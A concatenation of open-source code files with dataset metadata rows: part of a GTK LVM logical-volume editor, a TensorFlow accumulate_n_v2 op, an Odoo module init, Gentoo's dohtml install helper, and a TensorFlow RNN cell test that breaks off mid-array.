new_lv_command_set[NEW_LV_NUM_STRIPES_ARG] = stripes_num
new_lv_command_set[NEW_LV_SNAPSHOT] = self.snapshot
if self.snapshot:
new_lv_command_set[NEW_LV_SNAPSHOT_ORIGIN] = self.lv.get_path()
pvs_to_create_at = []
if mirrored_new:
size, b1, b2, l1 = self.__get_max_mirror_data(self.vg)
pvs_to_create_at = b1[:]
for pv in b2:
pvs_to_create_at.append(pv)
for pv in l1:
pvs_to_create_at.append(pv)
self.command_handler.new_lv(new_lv_command_set, pvs_to_create_at)
lv_path = self.model_factory.get_logical_volume_path(name_new, self.vg.get_name())
# make filesystem
if not self.snapshot:
try:
filesys_new.create(lv_path)
except CommandError, e:
self.command_handler.remove_lv(lv_path)
raise e
# mount
if mount_new:
self.command_handler.mount(lv_path, mountpoint_new, filesys_new.fsname)
if mount_at_reboot_new:
Fstab.add(lv_path, mountpoint_new, filesys_new.fsname)
else:
### edit LV ###
rename = name_new != self.lv.get_name()
filesys_change = (filesys_new != self.fs)
ext2_to_ext3 = (filesys_new.name == Filesystem.ext3().name) and (self.fs.name == Filesystem.ext2().name)
if ext2_to_ext3:
retval = self.questionMessage(_("Do you want to upgrade ext2 to ext3 preserving data on Logical Volume?"))
if (retval == gtk.RESPONSE_NO):
ext2_to_ext3 = False
snapshot = None
if self.lv.is_snapshot():
snapshot = self.lv.get_snapshot_info()[0]
resize = (size_new != self.size)
extend = (size_new > self.size)
reduce = (size_new < self.size)
# remove mirror if not needed anymore
if self.lv.is_mirrored() and not mirrored_new:
self.command_handler.remove_mirroring(self.lv.get_path())
      # DEBUGGING: check if resizing is possible
#if extend:
# if self.command_handler.extend_lv(self.lv.get_path(), size_new, True) == False:
# retval = self.infoMessage(_("fixme: resizing not possible"))
# return False
#elif reduce:
# if self.command_handler.reduce_lv(self.lv.get_path(), size_new, True) == False:
# retval = self.infoMessage(_("fixme: resizing not possible"))
# return False
mounted = self.mount
unmount = False
unmount_prompt = True
if rename or filesys_change or mount_new == False:
unmount = True
if resize and self.lv.is_mirrored():
unmount = True
if filesys_change and self.fs.name!=self.fs_none.name and not ext2_to_ext3:
retval = self.warningMessage(_("Changing the filesystem will destroy all data on the Logical Volume! Are you sure you want to proceed?"))
if (retval == gtk.RESPONSE_NO):
return False
unmount_prompt = False
else:
if not snapshot:
if extend and mounted and (not self.fs.extendable_online):
unmount = True
if reduce and mounted and (not self.fs.reducible_online):
unmount = True
# unmount if needed
if unmount and mounted:
if unmount_prompt:
retval = self.warningMessage(UNMOUNT_PROMPT % (self.lv.get_path(), self.mount_point))
if (retval == gtk.RESPONSE_NO):
return False
self.command_handler.unmount(self.mount_point)
mounted = False
# rename
if rename:
self.command_handler.rename_lv(self.vg.get_name(), self.lv.get_name(), name_new)
lv_path = self.model_factory.get_logical_volume_path(name_new, self.vg.get_name())
lv_path_old = self.lv.get_path()
# resize lv
if resize:
if (filesys_change and not ext2_to_ext3) or snapshot:
# resize LV only
if size_new > self.size:
self.command_handler.extend_lv(lv_path, size_new)
else:
self.command_handler.reduce_lv(lv_path, size_new)
else:
# resize lv and filesystem
if size_new > self.size:
# resize LV first
self.command_handler.extend_lv(lv_path, size_new)
# resize FS
try:
if mounted:
if self.fs.extendable_online:
self.fs.extend_online(lv_path)
else:
self.command_handler.unmount(self.mount_point)
mounted = False
self.fs.extend_offline(lv_path)
else:
if self.fs.extendable_offline:
self.fs.extend_offline(lv_path)
else:
# mount temporarily
tmp_mountpoint = '/tmp/tmp_mountpoint'
while os.access(tmp_mountpoint, os.F_OK):
tmp_mountpoint = tmp_mountpoint + '1'
os.mkdir(tmp_mountpoint)
self.command_handler.mount(lv_path, tmp_mountpoint)
self.fs.extend_online(lv_path)
self.command_handler.unmount(tmp_mountpoint)
os.rmdir(tmp_mountpoint)
except:
# revert LV size
self.command_handler.reduce_lv(lv_path, self.size)
raise
else:
# resize FS first
new_size_bytes = size_new * self.extent_size
if mounted:
if self.fs.reducible_online:
self.fs.reduce_online(lv_path, new_size_bytes)
else:
self.command_handler.unmount(self.mount_point)
mounted = False
self.fs.reduce_offline(lv_path, new_size_bytes)
else:
if self.fs.reducible_offline:
self.fs.reduce_offline(lv_path, new_size_bytes)
else:
# mount temporarily
tmp_mountpoint = '/tmp/tmp_mountpoint'
while os.access(tmp_mountpoint, os.F_OK):
tmp_mountpoint = tmp_mountpoint + '1'
os.mkdir(tmp_mountpoint)
self.command_handler.mount(lv_path, tmp_mountpoint)
self.fs.reduce_online(lv_path, new_size_bytes)
self.command_handler.unmount(tmp_mountpoint)
os.rmdir(tmp_mountpoint)
# resize LV
self.command_handler.reduce_lv(lv_path, size_new)
# add mirror if needed
if not self.lv.is_mirrored() and mirrored_new:
# first reload lvm_data so that resizing info is known
self.model_factory.reload()
self.lv = self.model_factory.get_VG(self.lv.get_vg().get_name()).get_lvs()[name_new]
# make room for mirror (free some pvs of main image's extents)
pvlist_from_make_room = self.__make_room_for_mirror(self.lv)
if pvlist_from_make_room == None:
# migration not performed, continue process with no mirroring
self.infoMessage(_("Mirror not created. Completing remaining tasks."))
else:
        # adding a mirror to an existing LV is not supported by the underlying
        # LVM, so inform the user and carry on with the remaining tasks
        self.infoMessage(_('Underlying LVM doesn\'t support addition of mirrors to existing Logical Volumes. Completing remaining tasks.'))
#self.command_handler.add_mirroring(self.lv.get_path(), pvlist_from_make_room)
pass
# fs options
if fs_options_changed and not filesys_change:
self.fs.change_options(lv_path)
# change FS
if filesys_change:
if ext2_to_ext3:
self.fs.upgrade(lv_path)
else:
filesys_new.create(lv_path)
# mount
fsname = self.fs.fsname
if filesys_change:
fsname = filesys_new.fsname
if mount_new and not mounted:
self.command_handler.mount(lv_path, mountpoint_new, fsname)
# remove old fstab entry
Fstab.remove(self.mount_point)
if mount_at_reboot_new:
# add new entry
Fstab.add(lv_path, mountpoint_new, fsname)
return True
# return list of pvs to use for mirror, or None on failure
def __make_room_for_mirror(self, lv):
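    # Collect the candidate PVs for the mirror (both halves plus the log PVs),
    # then migrate any of this LV's extents that are in the way, prompting the
    # user before moving anything.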
t, bucket1, bucket2, logs = self.__get_max_mirror_data(lv.get_vg())
return_pvlist = bucket1[:]
for pv in bucket2:
return_pvlist.append(pv)
for pv in logs:
return_pvlist.append(pv)
structs = self.__get_structs_for_ext_migration(lv)
if len(structs) == 0:
# nothing to be migrated
return return_pvlist
# extents need moving :(
string = ''
for struct in structs:
string = string + '\n' + struct[0].get_path()
string = string + ':' + str(struct[1]) + '-' + str(struct[1] + struct[2] - 1)
string = string + ' -> ' + struct[3].get_path()
rc = self.questionMessage(_("In order to add mirroring, some extents need to be migrated.") + '\n' + string + '\n' + _("Do you want to migrate specified extents?"))
if rc == gtk.RESPONSE_YES:
for struct in structs:
pv_from = struct[0]
ext_start = struct[1]
size = struct[2]
pv_to = struct[3]
self.command_handler.move_pv(pv_from.get_path(),
[(ext_start, size)],
[pv_to.get_path(), None, lv.get_path()])
return return_pvlist
else:
return None
# return [[pv_from, ext_start, size, pv_to], ...]
def __get_structs_for_ext_migration(self, lv):
t, bucket1, bucket2, logs = self.__get_max_mirror_data(lv.get_vg())
# pick bucket to move lv to
if self.__get_extent_count_in_bucket(lv, bucket1) < self.__get_extent_count_in_bucket(lv, bucket2):
bucket_to = bucket2
else:
bucket_to = bucket1
bucket_from = []
for pv in lv.get_vg().get_pvs().values():
if pv not in bucket_to:
bucket_from.append(pv)
structs = []
bucket_to_i = 0
pv_to = bucket_to[bucket_to_i]
free_exts = pv_to.get_extent_total_used_free()[2]
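    # Walk this LV's extent blocks on the source PVs and pack them into the
    # free extents of the target bucket's PVs, splitting blocks that do not
    # fit on a single destination PV.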
for pv_from in bucket_from:
for ext_block in pv_from.get_extent_blocks():
if ext_block.get_lv() != lv:
continue
block_start, block_size = ext_block.get_start_size()
while block_size != 0:
if block_size >= free_exts:
structs.append([pv_from, block_start, free_exts, pv_to])
block_start = block_start + free_exts
block_size = block_size - free_exts
# get next pv_to from bucket_to
bucket_to_i = bucket_to_i + 1
if bucket_to_i == len(bucket_to):
# should be done
return structs
pv_to = bucket_to[bucket_to_i]
free_exts = pv_to.get_extent_total_used_free()[2]
else:
structs.append([pv_from, block_start, block_size, pv_to])
block_start = block_start + block_size
block_size = block_size - block_size
free_exts = free_exts - block_size
return structs
def __get_extent_count_in_bucket(self, lv, bucket_pvs):
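    # Count how many extents of the given LV currently live on the listed PVs.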
ext_count = 0
for pv in bucket_pvs:
for ext_block in pv.get_extent_blocks():
if ext_block.get_lv() == lv:
ext_count = ext_count + ext_block.get_start_size()[1]
return ext_count
def errorMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_ERROR, gtk.BUTTONS_OK,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
return rc
def infoMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_INFO, gtk.BUTTONS_OK,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
return rc
def questionMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_INFO, gtk.BUTTONS_YES_NO,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
    if rc in (gtk.RESPONSE_NO, gtk.RESPONSE_DELETE_EVENT,
              gtk.RESPONSE_CLOSE, gtk.RESPONSE_CANCEL):
      return gtk.RESPONSE_NO
    else:
      return rc
def warningMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_WARNING, gtk.BUTTONS_YES_NO,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
    if rc in (gtk.RESPONSE_NO, gtk.RESPONSE_DELETE_EVENT,
              gtk.RESPONSE_CLOSE, gtk.RESPONSE_CANCEL):
      return gtk.RESPONSE_NO
    else:
      return rc
| gpl-2.0 | -661,362,197,953,986,600 | 42.015431 | 401 | 0.559245 | false |
av8ramit/tensorflow | tensorflow/contrib/framework/python/ops/accumulate_n_v2.py | 3 | 4363 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops that will eventually be folded into tensorflow/python/ops/math_ops.py
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import math_ops
def accumulate_n_v2(inputs, shape=None, tensor_dtype=None, name=None):
"""Returns the element-wise sum of a list of tensors.
Optionally, pass `shape` and `tensor_dtype` for shape and type checking,
otherwise, these are inferred.
`tf.accumulate_n_v2` performs the same operation as `tf.add_n`, but does not
wait for all of its inputs to be ready before beginning to sum. This can
save memory if inputs are ready at different times, since minimum temporary
storage is proportional to the output size rather than the inputs size.
Unlike the original `accumulate_n`, `accumulate_n_v2` is differentiable.
For example:
```python
a = tf.constant([[1, 2], [3, 4]])
b = tf.constant([[5, 0], [0, 6]])
tf.accumulate_n_v2([a, b, a]) # [[7, 4], [6, 14]]
# Explicitly pass shape and type
tf.accumulate_n_v2([a, b, a], shape=[2, 2], tensor_dtype=tf.int32)
# [[7, 4],
# [6, 14]]
```
Args:
inputs: A list of `Tensor` objects, each with same shape and type.
shape: Shape of elements of `inputs`.
tensor_dtype: The type of `inputs`.
name: A name for the operation (optional).
Returns:
A `Tensor` of same shape and type as the elements of `inputs`.
Raises:
ValueError: If `inputs` don't all have same shape and dtype or the shape
cannot be inferred.
"""
  _INPUTS_ERR_MSG = ValueError("inputs must be a list of at least one Tensor "
                               "with the same dtype and shape")
if not inputs or not isinstance(inputs, (list, tuple)):
raise _INPUTS_ERR_MSG
inputs = ops.convert_n_to_tensor_or_indexed_slices(inputs)
if not all(isinstance(x, ops.Tensor) for x in inputs):
raise _INPUTS_ERR_MSG
if not all(x.dtype == inputs[0].dtype for x in inputs):
raise _INPUTS_ERR_MSG
if shape is not None:
shape = tensor_shape.as_shape(shape)
else:
shape = tensor_shape.unknown_shape()
for input_tensor in inputs:
if isinstance(input_tensor, ops.Tensor):
shape = shape.merge_with(input_tensor.get_shape())
# tensor_dtype is for safety only; operator's output type computed in C++
if tensor_dtype is not None and tensor_dtype != inputs[0].dtype:
raise TypeError("tensor_dtype is {}, but input is of type {}"
.format(tensor_dtype, inputs[0].dtype))
if len(inputs) == 1 and name is None:
return inputs[0]
elif len(inputs) == 1 and name is not None:
return array_ops.identity(inputs[0], name=name)
elif context.in_eager_mode():
# TemporaryVariable not currently supported in eager mode; fall back
# onto AddN for now.
# TODO(frreiss) remove this once the lifetime of eager variables gets
# addressed
return math_ops.add_n(inputs, name=name)
else:
return gen_math_ops._accumulate_nv2(inputs, name=name, shape=shape)
# The following code should eventually be merged into
# tensorflow/python/ops/math_grad.py
@ops.RegisterGradient("AccumulateNV2")
def _AddNGrad(op, grad):
"""Same as gradient for AddN. Copies the gradient to all inputs."""
# Not broadcasting.
return [grad] * len(op.inputs)
| apache-2.0 | 3,329,057,445,318,795,300 | 38.306306 | 80 | 0.67041 | false |
ddico/sale-workflow | sale_properties_dynamic_fields/__init__.py | 15 | 1047 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014-15 Agile Business Group sagl
# (<http://www.agilebg.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import sale_order
from . import sale_order_line
from . import mrp_property_group
| agpl-3.0 | -3,072,007,925,824,498,700 | 42.625 | 78 | 0.608405 | false |
funtoo/portage-funtoo | bin/dohtml.py | 1 | 6296 | #!/usr/bin/python
# Copyright 1999-2013 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
#
# Typical usage:
# dohtml -r docs/*
# - put all files and directories in docs into /usr/share/doc/${PF}/html
# dohtml foo.html
# - put foo.html into /usr/share/doc/${PF}/html
#
#
# Detailed usage:
# dohtml <list-of-files>
# - will install the files in the list of files (space-separated list) into
# /usr/share/doc/${PF}/html, provided the file ends in .css, .gif, .htm,
# .html, .jpeg, .jpg, .js or .png.
# dohtml -r <list-of-files-and-directories>
# - will do as 'dohtml', but recurse into all directories, as long as the
# directory name is not CVS
# dohtml -A jpe,java [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but add .jpe,.java (default filter list is
# added to your list)
# dohtml -a png,gif,html,htm [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but filter on .png,.gif,.html,.htm (default filter
# list is ignored)
# dohtml -x CVS,SCCS,RCS -r <list-of-files-and-directories>
# - will do as 'dohtml -r', but ignore directories named CVS, SCCS, RCS
#
from __future__ import print_function
import os
import sys
# Change back to original cwd _after_ all imports (bug #469338).
os.chdir(os.environ["__PORTAGE_HELPER_CWD"])
def dodir(path):
os.spawnlp(os.P_WAIT, "install", "install", "-d", path)
def dofile(src,dst):
os.spawnlp(os.P_WAIT, "install", "install", "-m0644", src, dst)
def eqawarn(lines):
cmd = "source '%s/isolated-functions.sh' ; " % \
os.environ["PORTAGE_BIN_PATH"]
for line in lines:
cmd += "eqawarn \"%s\" ; " % line
os.spawnlp(os.P_WAIT, "bash", "bash", "-c", cmd)
skipped_directories = []
skipped_files = []
warn_on_skipped_files = os.environ.get("PORTAGE_DOHTML_WARN_ON_SKIPPED_FILES") is not None
unwarned_skipped_extensions = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_EXTENSIONS", "").split()
unwarned_skipped_files = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_FILES", "").split()
def install(basename, dirname, options, prefix=""):
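	# Install one file into the doc tree if its extension (or exact name) is
	# allowed, or recurse into a directory when -r was given (skipping the
	# disallowed ones). Returns False for missing paths, directories that are
	# not descended into, and anything that is neither a file nor a directory;
	# True otherwise.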
fullpath = basename
if prefix:
fullpath = prefix + "/" + fullpath
if dirname:
fullpath = dirname + "/" + fullpath
if options.DOCDESTTREE:
destdir = options.ED + "usr/share/doc/" + options.PF + "/" + options.DOCDESTTREE + "/" + options.doc_prefix + "/" + prefix
else:
destdir = options.ED + "usr/share/doc/" + options.PF + "/html/" + options.doc_prefix + "/" + prefix
if not os.path.exists(fullpath):
sys.stderr.write("!!! dohtml: %s does not exist\n" % fullpath)
return False
elif os.path.isfile(fullpath):
ext = os.path.splitext(basename)[1][1:]
if ext in options.allowed_exts or basename in options.allowed_files:
dodir(destdir)
dofile(fullpath, destdir + "/" + basename)
elif warn_on_skipped_files and ext not in unwarned_skipped_extensions and basename not in unwarned_skipped_files:
skipped_files.append(fullpath)
elif options.recurse and os.path.isdir(fullpath) and \
basename not in options.disallowed_dirs:
for i in os.listdir(fullpath):
pfx = basename
if prefix: pfx = prefix + "/" + pfx
install(i, dirname, options, pfx)
elif not options.recurse and os.path.isdir(fullpath):
global skipped_directories
skipped_directories.append(fullpath)
return False
else:
return False
return True
class OptionsClass:
def __init__(self):
self.PF = ""
self.ED = ""
self.DOCDESTTREE = ""
if "PF" in os.environ:
self.PF = os.environ["PF"]
if "force-prefix" not in os.environ.get("FEATURES", "").split() and \
os.environ.get("EAPI", "0") in ("0", "1", "2"):
self.ED = os.environ.get("D", "")
else:
self.ED = os.environ.get("ED", "")
if "_E_DOCDESTTREE_" in os.environ:
self.DOCDESTTREE = os.environ["_E_DOCDESTTREE_"]
self.allowed_exts = ['css', 'gif', 'htm', 'html', 'jpeg', 'jpg', 'js', 'png']
if os.environ.get("EAPI", "0") in ("4-python", "5-progress"):
self.allowed_exts += ['ico', 'svg', 'xhtml', 'xml']
self.allowed_files = []
self.disallowed_dirs = ['CVS']
self.recurse = False
self.verbose = False
self.doc_prefix = ""
def print_help():
opts = OptionsClass()
print("dohtml [-a .foo,.bar] [-A .foo,.bar] [-f foo,bar] [-x foo,bar]")
print(" [-r] [-V] <file> [file ...]")
print()
print(" -a Set the list of allowed to those that are specified.")
print(" Default:", ",".join(opts.allowed_exts))
print(" -A Extend the list of allowed file types.")
print(" -f Set list of allowed extensionless file names.")
print(" -x Set directories to be excluded from recursion.")
print(" Default:", ",".join(opts.disallowed_dirs))
print(" -p Set a document prefix for installed files (empty by default).")
print(" -r Install files and directories recursively.")
print(" -V Be verbose.")
print()
def parse_args():
options = OptionsClass()
args = []
x = 1
while x < len(sys.argv):
arg = sys.argv[x]
if arg in ["-h","-r","-V"]:
if arg == "-h":
print_help()
sys.exit(0)
elif arg == "-r":
options.recurse = True
elif arg == "-V":
options.verbose = True
elif sys.argv[x] in ["-A","-a","-f","-x","-p"]:
x += 1
if x == len(sys.argv):
print_help()
sys.exit(0)
elif arg == "-p":
options.doc_prefix = sys.argv[x]
else:
values = sys.argv[x].split(",")
if arg == "-A":
options.allowed_exts.extend(values)
elif arg == "-a":
options.allowed_exts = values
elif arg == "-f":
options.allowed_files = values
elif arg == "-x":
options.disallowed_dirs = values
else:
args.append(sys.argv[x])
x += 1
return (options, args)
def main():
(options, args) = parse_args()
if options.verbose:
print("Allowed extensions:", options.allowed_exts)
print("Document prefix : '" + options.doc_prefix + "'")
print("Allowed files :", options.allowed_files)
success = False
for x in args:
basename = os.path.basename(x)
dirname = os.path.dirname(x)
success |= install(basename, dirname, options)
for x in skipped_directories:
eqawarn(["QA Notice: dohtml on directory '%s' without recursion option" % x])
for x in skipped_files:
eqawarn(["dohtml: skipped file '%s'" % x])
if success:
retcode = 0
else:
retcode = 1
sys.exit(retcode)
if __name__ == "__main__":
main()
| gpl-2.0 | -243,913,840,125,863,680 | 29.862745 | 124 | 0.644377 | false |
anand-c-goog/tensorflow | tensorflow/contrib/rnn/python/kernel_tests/rnn_cell_test.py | 4 | 34623 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for RNN cells."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class RNNCellTest(tf.test.TestCase):
def testCoupledInputForgetGateLSTMCell(self):
with self.test_session() as sess:
num_units = 2
state_size = num_units * 2
batch_size = 3
input_size = 4
expected_output = np.array(
[[0.121753, 0.121753],
[0.103349, 0.103349],
[0.100178, 0.100178]],
dtype=np.float32)
expected_state = np.array(
[[0.137523, 0.137523, 0.121753, 0.121753],
[0.105450, 0.105450, 0.103349, 0.103349],
[0.100742, 0.100742, 0.100178, 0.100178]],
dtype=np.float32)
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([batch_size, input_size])
m = tf.zeros([batch_size, state_size])
output, state = tf.contrib.rnn.CoupledInputForgetGateLSTMCell(
num_units=num_units, forget_bias=1.0)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state],
{x.name: np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]]),
m.name: 0.1 * np.ones((batch_size, state_size))})
# This is a smoke test: Only making sure expected values didn't change.
self.assertEqual(len(res), 2)
self.assertAllClose(res[0], expected_output)
self.assertAllClose(res[1], expected_state)
def testTimeFreqLSTMCell(self):
with self.test_session() as sess:
num_units = 8
state_size = num_units * 2
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_shifts = (input_size - feature_size) / frequency_skip + 1
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([batch_size, input_size])
m = tf.zeros([batch_size, state_size*num_shifts])
output, state = tf.contrib.rnn.TimeFreqLSTMCell(
num_units=num_units, feature_size=feature_size,
frequency_skip=frequency_skip, forget_bias=1.0)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state],
{x.name: np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]]),
m.name: 0.1 * np.ones((batch_size, state_size*(
num_shifts)))})
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape, (batch_size, num_units*num_shifts))
self.assertEqual(res[1].shape, (batch_size, state_size*num_shifts))
# Different inputs so different outputs and states
for i in range(1, batch_size):
self.assertTrue(
float(np.linalg.norm((res[0][0, :] - res[0][i, :]))) > 1e-6)
self.assertTrue(
float(np.linalg.norm((res[1][0, :] - res[1][i, :]))) > 1e-6)
def testGridLSTMCell(self):
with self.test_session() as sess:
num_units = 8
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_shifts = int((input_size - feature_size) / frequency_skip + 1)
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.rnn.GridLSTMCell(
num_units=num_units, feature_size=feature_size,
frequency_skip=frequency_skip, forget_bias=1.0,
num_frequency_blocks=[num_shifts],
couple_input_forget_gates=True,
state_is_tuple=True)
inputs = tf.constant(np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]],
dtype=np.float32), dtype=tf.float32)
state_value = tf.constant(
0.1 * np.ones((batch_size, num_units), dtype=np.float32),
dtype=tf.float32)
init_state = cell.state_tuple_type(
*([state_value, state_value] * num_shifts))
output, state = cell(inputs, init_state)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state])
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape, (batch_size, num_units * num_shifts * 2))
for ss in res[1]:
self.assertEqual(ss.shape, (batch_size, num_units))
# Different inputs so different outputs and states
for i in range(1, batch_size):
self.assertTrue(
float(np.linalg.norm((res[0][0, :] - res[0][i, :]))) > 1e-6)
self.assertTrue(float(np.linalg.norm(
(res[1].state_f00_b00_c[0, :] - res[1].state_f00_b00_c[i, :])))
> 1e-6)
def testGridLSTMCellWithFrequencyBlocks(self):
with self.test_session() as sess:
num_units = 8
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_frequency_blocks = [1, 1]
total_blocks = num_frequency_blocks[0] + num_frequency_blocks[1]
start_freqindex_list = [0, 2]
end_freqindex_list = [2, 4]
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.rnn.GridLSTMCell(
num_units=num_units, feature_size=feature_size,
frequency_skip=frequency_skip, forget_bias=1.0,
num_frequency_blocks=num_frequency_blocks,
start_freqindex_list=start_freqindex_list,
end_freqindex_list=end_freqindex_list,
couple_input_forget_gates=True,
state_is_tuple=True)
inputs = tf.constant(np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]],
dtype=np.float32), dtype=tf.float32)
state_value = tf.constant(
0.1 * np.ones((batch_size, num_units), dtype=np.float32),
dtype=tf.float32)
init_state = cell.state_tuple_type(
*([state_value, state_value] * total_blocks))
output, state = cell(inputs, init_state)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state])
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape,
(batch_size, num_units * total_blocks * 2))
for ss in res[1]:
self.assertEqual(ss.shape, (batch_size, num_units))
# Different inputs so different outputs and states
for i in range(1, batch_size):
self.assertTrue(
float(np.linalg.norm((res[0][0, :] - res[0][i, :]))) > 1e-6)
self.assertTrue(float(np.linalg.norm(
(res[1].state_f00_b00_c[0, :] - res[1].state_f00_b00_c[i, :])))
> 1e-6)
def testGridLstmCellWithCoupledInputForgetGates(self):
num_units = 2
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_shifts = int((input_size - feature_size) / frequency_skip + 1)
expected_output = np.array(
[[0.416383, 0.416383, 0.403238, 0.403238, 0.524020, 0.524020,
0.565425, 0.565425, 0.557865, 0.557865, 0.609699, 0.609699],
[0.627331, 0.627331, 0.622393, 0.622393, 0.688342, 0.688342,
0.708078, 0.708078, 0.694245, 0.694245, 0.715171, 0.715171],
[0.711050, 0.711050, 0.709197, 0.709197, 0.736533, 0.736533,
0.744264, 0.744264, 0.737390, 0.737390, 0.745250, 0.745250]],
dtype=np.float32)
expected_state = np.array(
[[0.625556, 0.625556, 0.416383, 0.416383, 0.759134, 0.759134,
0.524020, 0.524020, 0.798795, 0.798795, 0.557865, 0.557865],
[0.875488, 0.875488, 0.627331, 0.627331, 0.936432, 0.936432,
0.688342, 0.688342, 0.941961, 0.941961, 0.694245, 0.694245],
[0.957327, 0.957327, 0.711050, 0.711050, 0.979522, 0.979522,
0.736533, 0.736533, 0.980245, 0.980245, 0.737390, 0.737390]],
dtype=np.float32)
for state_is_tuple in [False, True]:
with self.test_session() as sess:
with tf.variable_scope("state_is_tuple" + str(state_is_tuple),
initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.rnn.GridLSTMCell(
num_units=num_units, feature_size=feature_size,
frequency_skip=frequency_skip, forget_bias=1.0,
num_frequency_blocks=[num_shifts],
couple_input_forget_gates=True,
state_is_tuple=state_is_tuple)
inputs = tf.constant(np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]],
dtype=np.float32), dtype=tf.float32)
if state_is_tuple:
state_value = tf.constant(
0.1 * np.ones((batch_size, num_units), dtype=np.float32),
dtype=tf.float32)
init_state = cell.state_tuple_type(
*([state_value, state_value] * num_shifts))
else:
init_state = tf.constant(
0.1 * np.ones((batch_size, num_units * num_shifts * 2),
dtype=np.float32),
dtype=tf.float32)
output, state = cell(inputs, init_state)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state])
          # This is a smoke test: Only making sure expected values did not change.
self.assertEqual(len(res), 2)
self.assertAllClose(res[0], expected_output)
if not state_is_tuple:
self.assertAllClose(res[1], expected_state)
else:
# There should be num_shifts * 2 states in the tuple.
self.assertEqual(len(res[1]), num_shifts * 2)
# Checking the shape of each state to be batch_size * num_units
for ss in res[1]:
self.assertEqual(ss.shape[0], batch_size)
self.assertEqual(ss.shape[1], num_units)
self.assertAllClose(np.concatenate(res[1], axis=1), expected_state)
def testBidirectionGridLSTMCell(self):
with self.test_session() as sess:
num_units = 2
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_shifts = int((input_size - feature_size) / frequency_skip + 1)
expected_output = np.array(
[[0.464130, 0.464130, 0.419165, 0.419165, 0.593283, 0.593283,
0.738350, 0.738350, 0.661638, 0.661638, 0.866774, 0.866774,
0.520789, 0.520789, 0.476968, 0.476968, 0.604341, 0.604341,
0.760207, 0.760207, 0.635773, 0.635773, 0.850218, 0.850218],
[0.669636, 0.669636, 0.628966, 0.628966, 0.736057, 0.736057,
0.895927, 0.895927, 0.755559, 0.755559, 0.954359, 0.954359,
0.692621, 0.692621, 0.652363, 0.652363, 0.737517, 0.737517,
0.899558, 0.899558, 0.745984, 0.745984, 0.946840, 0.946840],
[0.751109, 0.751109, 0.711716, 0.711716, 0.778357, 0.778357,
0.940779, 0.940779, 0.784530, 0.784530, 0.980604, 0.980604,
